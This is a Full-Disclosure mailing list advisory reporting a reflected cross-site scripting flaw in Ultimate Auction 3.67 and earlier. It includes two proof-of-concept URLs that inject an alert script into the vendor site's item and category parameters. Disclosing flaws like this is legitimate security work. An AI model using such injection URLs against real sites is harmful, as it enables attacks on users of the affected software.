[Full-disclosure] Ultimate Auction <=3.67

Hello!

I've found a XSS in Ultimate Auction <=3.67. The Vendor was informed mid
October 2005! They still haven't fix the script and doesn't reply to mails.

Here's a little Example:

http://www.ultimate-auction.de/cgi-local/auktion/item.pl/item.pl?item=&lt;script&gt;alert&#40;&quot;XSS&quot;&#41;&lt;/script&gt;
http://www.ultimate-auction.de/cgi-local/auktion/itemlist.pl?category=&lt;script&gt;alert&#40;&quot;XSS&quot;&#41;&lt;/script&gt;

The bug has the BID 16239

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/